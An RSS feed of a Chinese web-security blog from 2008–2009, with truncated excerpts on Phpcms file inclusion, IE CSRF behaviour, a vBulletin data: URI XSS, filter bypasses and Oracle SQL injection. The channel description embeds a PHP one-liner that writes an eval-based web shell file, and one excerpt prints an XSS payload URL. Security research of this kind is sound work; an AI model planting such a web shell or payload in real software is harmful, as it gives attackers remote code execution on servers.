<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
 <channel>
  <title>5up3rh3i'blog［提供有偿web代码安全审计服务］</title>
  <link>http://superhei.blogbus.com</link>
  <description><![CDATA[MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? > ]]></description>
  <generator> by blogbus.com </generator>
  <lastBuildDate>Thu, 19 Nov 2009 04:31:24 +0800</lastBuildDate>
  <image>
									<url>http://public.blogbus.com/profile/8/5/8/1117858/avatar_1117858_96.jpg</url>
									<title>5up3rh3i'blog［提供有偿web代码安全审计服务］</title>
									<link>http://superhei.blogbus.com</link>
								</image>  <item>
   <title>在百度的blog</title>
   <description><![CDATA[在百度的blog<br /><br />
http://hi.baidu.com/hi_heige<br /><br /><!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/13600140.html">[zz]DOM for hackers</a> 2008-01-09</div><div><a href="/logs/10582982.html">create_function</a> 2007-11-01</div><div><a href="/logs/8385157.html">现在的人真牛~~</a> 2007-09-22</div><div><a href="/logs/2012615.html">[zz]Grep学习笔记</a> 2006-03-06</div><div><a href="/logs/1926874.html">回学校了``</a> 2006-02-14</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F37074507.html&title=%E5%9C%A8%E7%99%BE%E5%BA%A6%E7%9A%84blog">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/37074507.html</link>
   <author>superhei</author>
   <pubDate>Thu, 26 Mar 2009 21:23:14 +0800</pubDate>
  </item>
  <item>
   <title>[zz]Phpcms 2007 远程文件包含漏洞</title>
   <description><![CDATA[[zz]Phpcms 2007 远程文件包含漏洞<br /><br />url:http://www.wolvez.org/forum/redirect.php?tid=182&amp;goto=lastpost<br /><br />这个漏洞是一个比较普通的变量覆盖漏洞，这里转一下是由于发现这个漏洞如果是白盒那要都仔细看代码才行 ：）<br /><br />引用 ：<br /><br />------------------------------------------------<br />/...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/10161450.html">郁闷的blogbus</a> 2007-10-04</div><div><a href="/logs/7889121.html">GRASP</a> 2007-08-23</div><div><a href="/logs/4971079.html">The current state of PHP security (w/ MOPB full review)</a> 2007-04-07</div><div><a href="/logs/2798316.html">近期可能无法上网</a> 2006-07-09</div><div><a href="/logs/2383334.html">Sablog-x v1.0 Vulnerability</a> 2006-05-01</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24755478.html&title=%5Bzz%5DPhpcms+2007+%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24755478.html</link>
   <author>superhei</author>
   <pubDate>Mon, 14 Jul 2008 23:49:04 +0800</pubDate>
  </item>
  <item>
   <title>blog又又又被黑</title>
   <description><![CDATA[<br /><br />该牛人不愿意透露细节:(<br /><br />主要原因估计是我得罪的人太多了..... .所以友情提醒下看我blog的朋友啊,请使用ff+noscript 防止被人挂马等估计 :) .看来我自己也要注意下安全了 老是被黑 朋友都不信任我了 呵呵<br /><br />另外fuck一下blogbus 后台连个修改密码的地方都没有<br /><br /><!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/8320696.html">The Unexpected SQL Injection</a> 2007-09-17</div><div><a href="/logs/5064046.html">请转贴的朋友不要乱修改原文！！</a> 2007-04-17</div><div><a href="/logs/5056322.html">关于defined()</a> 2007-04-16</div><div><a href="/logs/4971186.html">Holes in most preg_match() filters</a> 2007-04-07</div><div><a href="/logs/4971079.html">The current state of PHP security (w/ MOPB full review)</a> 2007-04-07</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24533292.html&title=blog%E5%8F%88%E5%8F%88%E5%8F%88%E8%A2%AB%E9%BB%91">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24533292.html</link>
   <author>superhei</author>
   <pubDate>Fri, 11 Jul 2008 14:53:03 +0800</pubDate>
  </item>
  <item>
   <title>[zz]Microsoft Blogs and Web Resources about Security</title>
   <description><![CDATA[http://blogs.technet.com/feliciano_intini/pages/microsoft-blogs-and-web-resources-about-security.aspx<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/21533832.html">A New Class of Vulnerability in Oracle: Lateral SQL Injection</a> 2008-05-24</div><div><a href="/logs/12837771.html">活着～～～～</a> 2007-12-28</div><div><a href="/logs/10582982.html">create_function</a> 2007-11-01</div><div><a href="/logs/5090915.html">关于幻影无法访问的问题</a> 2007-04-20</div><div><a href="/logs/2905040.html">Acunetix Web Vulnerability Scanner 4</a> 2006-07-25</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F24056691.html&title=%5Bzz%5DMicrosoft+Blogs+and+Web+Resources+about+Security">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/24056691.html</link>
   <author>superhei</author>
   <pubDate>Thu, 03 Jul 2008 20:05:28 +0800</pubDate>
  </item>
  <item>
   <title>学习WebZine [0x02]后乱谈</title>
   <description><![CDATA[学习WebZine [0x02]后乱谈<br /><br />文/superhei<br /><br />这里学习了下自己看的明白的PP<br /><br />[<a href="http://www.ph4nt0m.org/" target="_blank">PST</a>Zine 0x02][0x07][乱谈之XSS攻击检测]<br /><br />这个文章里提到了几个有趣的漏洞：<br /><br />1.phpinfo() 4096字节后的xss,这个漏洞要是不去分析php的源代码是没有办法发现的，很多人看应用程序的原代码只去分析溢出等问题，但是忽视了应用上的安全，这个还是要看发现者的意识，SE大...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/15909339.html">[tool]小颖Java源代码反编译超级引挚</a> 2008-02-24</div><div><a href="/logs/10916401.html">7th OWASP AppSec Conference - San Jose 2007/Agenda</a> 2007-11-22</div><div><a href="/logs/5502029.html">做人也要有那么点原则</a> 2007-05-24</div><div><a href="/logs/4255503.html">WordPress wp-trackback.php漏洞分析</a> 2007-01-10</div><div><a href="/logs/2259673.html">php往届bugs</a> 2006-04-13</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23531061.html&title=%E5%AD%A6%E4%B9%A0WebZine+%5B0x02%5D%E5%90%8E%E4%B9%B1%E8%B0%88">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23531061.html</link>
   <author>superhei</author>
   <pubDate>Wed, 25 Jun 2008 00:24:20 +0800</pubDate>
  </item>
  <item>
   <title>犯了个很严重的错误 :(</title>
   <description><![CDATA[qz的blog上：http://xss.betaslife.com/blog/?p=24<br /><br />&nbsp; 在IE下，从站外来进行的大部分的CSRF攻击是无效的（直接访问的表单构造的POST请求除外），包括IMG,IFRAME等伪造请求。因为IE的安全
特性，无论是使用当前浏览器进程得到的cookie还是浏览器本地保存的cookie，隐私保护会拦截第三方站点的COOKIE。<br /><br />今天测试了一下ie6/7确实都是这样的 图：<br /><br />&nbsp;我一...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/23220981.html">WebZine [0x02]</a> 2008-06-19</div><div><a href="/logs/15909339.html">[tool]小颖Java源代码反编译超级引挚</a> 2008-02-24</div><div><a href="/logs/10565484.html">[zz]TikiWiki Remote PHP Code Evaluation Vulnerability</a> 2007-10-30</div><div><a href="/logs/3957127.html">郁闷！！！</a> 2006-12-02</div><div><a href="/logs/3250092.html">Build Security In Home</a> 2006-09-06</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23466639.html&title=%E7%8A%AF%E4%BA%86%E4%B8%AA%E5%BE%88%E4%B8%A5%E9%87%8D%E7%9A%84%E9%94%99%E8%AF%AF+%3A%28">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23466639.html</link>
   <author>superhei</author>
   <pubDate>Mon, 23 Jun 2008 22:41:18 +0800</pubDate>
  </item>
  <item>
   <title>Data:_URI_scheme</title>
   <description><![CDATA[Data:_URI_scheme<br /><br />前几天FD上公布了一个vbb的xss: http://seclists.org/fulldisclosure/2008/Jun/0181.html,这个bug比较有意思：<br /><br />admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K<br /><br />代码：admincp/index.php 98-10...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/18281898.html">wmic-The WMI command-line</a> 2008-04-04</div><div><a href="/logs/11792433.html">Discuz!/phpwind flash标签的xss</a> 2007-12-10</div><div><a href="/logs/5502029.html">做人也要有那么点原则</a> 2007-05-24</div><div><a href="/logs/5187104.html">SET CHARACTER</a> 2007-04-28</div><div><a href="/logs/2227583.html">Oedipus</a> 2006-04-08</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23355141.html&title=Data%3A_URI_scheme">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23355141.html</link>
   <author>superhei</author>
   <pubDate>Sat, 21 Jun 2008 23:39:48 +0800</pubDate>
  </item>
  <item>
   <title>WebZine [0x02]</title>
   <description><![CDATA[2008.6.18 - WebZine [0x02]<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/8058056.html">社会记录-白领日志</a> 2007-09-02</div><div><a href="/logs/5502029.html">做人也要有那么点原则</a> 2007-05-24</div><div><a href="/logs/4255503.html">WordPress wp-trackback.php漏洞分析</a> 2007-01-10</div><div><a href="/logs/2227583.html">Oedipus</a> 2006-04-08</div><div><a href="/logs/2057692.html">include包含日志</a> 2006-03-14</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F23220981.html&title=WebZine+%5B0x02%5D">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/23220981.html</link>
   <author>superhei</author>
   <pubDate>Thu, 19 Jun 2008 15:10:27 +0800</pubDate>
  </item>
  <item>
   <title>Bypassing script filters with variable-width encodings</title>
   <description><![CDATA[url:http://applesoup.googlepages.com/bypass_filter.txt <br /><br />作者测试的时候还是ie6今天测试了一把ie7：<br /><br />http://60.190.243.111/superhei/xss/charset.bmp<br /><br />我这里没有ie8的，有的同学帮忙测试下,测试代码为原文里的 example.php<br /><br />结果模块： http://60.190.243.111/superhei/xs...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/23355141.html">Data:_URI_scheme</a> 2008-06-21</div><div><a href="/logs/19956354.html">rgod:i am not dead~~</a> 2008-04-29</div><div><a href="/logs/3789849.html">Google---We're sorry</a> 2006-11-08</div><div><a href="/logs/1978040.html">又是被动过滤.....</a> 2006-02-26</div><div><a href="/logs/1879855.html">casi4</a> 2006-02-02</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F22568721.html&title=Bypassing+script+filters+with+variable-width+encodings">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/22568721.html</link>
   <author>superhei</author>
   <pubDate>Mon, 09 Jun 2008 12:03:58 +0800</pubDate>
  </item>
  <item>
   <title>A New Class of Vulnerability in Oracle: Lateral SQL Injection</title>
   <description><![CDATA[avid Litchfield 在他的blog上写了一些关于他pp《A New Class of Vulnerability in Oracle: Lateral SQL Injection》的一些说明：<br /><br />http://www.davidlitchfield.com/blog/archives/00000042.htm<br /><br />里面有个8挂就是：<br /><br />5) This paper is mostly academic<br />No, it's n...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/21410547.html">Time-Based Blind SQL Injection with Heavy Queries</a> 2008-05-22</div><div><a href="/logs/13259295.html">Flash Update</a> 2008-01-03</div><div><a href="/logs/10565484.html">[zz]TikiWiki Remote PHP Code Evaluation Vulnerability</a> 2007-10-30</div><div><a href="/logs/8058056.html">社会记录-白领日志</a> 2007-09-02</div><div><a href="/logs/3957127.html">郁闷！！！</a> 2006-12-02</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fsuperhei.blogbus.com%2Flogs%2F21533832.html&title=A+New+Class+of+Vulnerability+in+Oracle%3A+Lateral+SQL+Injection">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://superhei.blogbus.com/logs/21533832.html</link>
   <author>superhei</author>
   <pubDate>Sat, 24 May 2008 16:34:54 +0800</pubDate>
  </item>
 </channel>
</rss>
